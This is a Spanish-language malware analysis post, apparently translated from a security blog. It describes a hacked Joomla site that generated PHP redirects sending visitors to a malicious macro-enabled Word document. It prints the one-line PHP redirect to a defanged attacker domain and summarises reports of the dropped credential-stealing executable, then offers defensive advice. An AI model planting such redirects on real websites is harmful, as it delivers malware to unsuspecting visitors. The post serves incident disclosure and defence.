Redireccionamiento para Virus de Macro en Microsoft Word

Share this…

En la actualidad, casi no se habla de malware de Microsoft Word en sitios web, pero eso todavía existe y sitios web infectados pueden distribuir todo tipo de malware. No sólo los archivos adjuntos de correo electrónico cuando se trata de compartir documentos infectados.

Por ejemplo, este archivo malicioso fue encontrado por nuestro analista de seguridad Krasimir Konov en un sitio Joomla hackeado.

Código de PHP redirecciona para un documento Microsoft Word malicioso
Código de PHP redirecciona para un documento Microsoft Word malicioso

Este script crea 50 directorios con nombres aleatorios, donde cada directorio contiene un archivo PHP con un nombre aleatorio y este contenido:

<?php
header('Location: hxxp://paysdevian[.]com/english/document.docm');
?>

Este malware redirige a los visitantes a un sitio web que se inicia automáticamente al descargar el archivo document.docm. DOCM es una extensión utilizada para archivos de Word Microsoft Office Open XML Format Document (Macros Habilitados).

Análisis de Malware

Como se esperaba, el documento es malicioso. Sigue el informe de Virus Total:

  • El archivo estudiado usa macros…
  • Ejecuta comandos e instrucciones automáticamente cuando se abre el archivo.
  • Puede leer las variables del sistema.
  • Puede abrir el archivo.
  • Puede gravar en el archivo.
  • Puede hacer operaciones con otros archivos.
  • etc…

Sigue un informe de Malwr sobre otro archivo .docm (compte9049.docm) depaysdevian[.]com. Diciendo que el archivo:

  • Roba información privada de los navegadores de Internet locales.
  • Se instala con la funcionalidad de la ejecución automática en Windows.

Hay también el análisis de Seguridad del Payload de su archivo. Es lo que muestra el arquivo .exe Visual Basic macro drops llamado de settledTeqOCqX.exe. En el informe de Malwr, el nombre del archivo es oXOkSTintruder.exe , pero ese el el mismo archivo. Ese archivo puede venir con muchos nombres diferentes. Aquí hay otros nombres diferentes y la tasa de detección del análisis de Virus Total fue de: 36 / 56.

Cuando analisaba otros informes de VirusTotal, me di cuenta de que las personas habían sometido muchos archivos .docm similares con nombres distintos, como:compte9049.docm, compte1035.docm, copie2292.docm, compte9049.docm, dossier7570.docm, copie4328.docm, etc., en Septiembre.

Sitios Web Hackeados Complementan Emails Maliciosos

Hasta donde sabemos, los hackers utilizan sitios web infectados comopaysdevian[.]com para almacenar documentos maliciosos de Word. También utilizan otros sitios web infectados para redirigir estos documentos, con el objetivo de utilizar links en correos electrónicos. Este esquema ayuda a los atacantes a:

  • Evitar notificaciones de antivirus en los correos electrónicos de los clientes y en los servicios de correos electrónicos en línea.
  • Ocultar la ubicación real del documento malicioso que iba a cambiar la URL todos los días, evitando los problemas de listas negras.

Recuerde que si tiene Microsoft Word (o cualquier otro producto de Office) instalado en su equipo, siga estos consejos para estar seguro:

  • Su navegador no debe abrir documentos de Word de forma automática.
  • Macros deben ser desactivadas por defecto en los documentos de Word.

Si usted tiene un sitio web, asegúrese de que él es seguro,
de lo contrario, su sitio web puede ser utilizado por los piratas informáticos para almacenar y distribuir malware.

Fuente:https://blog.sucuri.net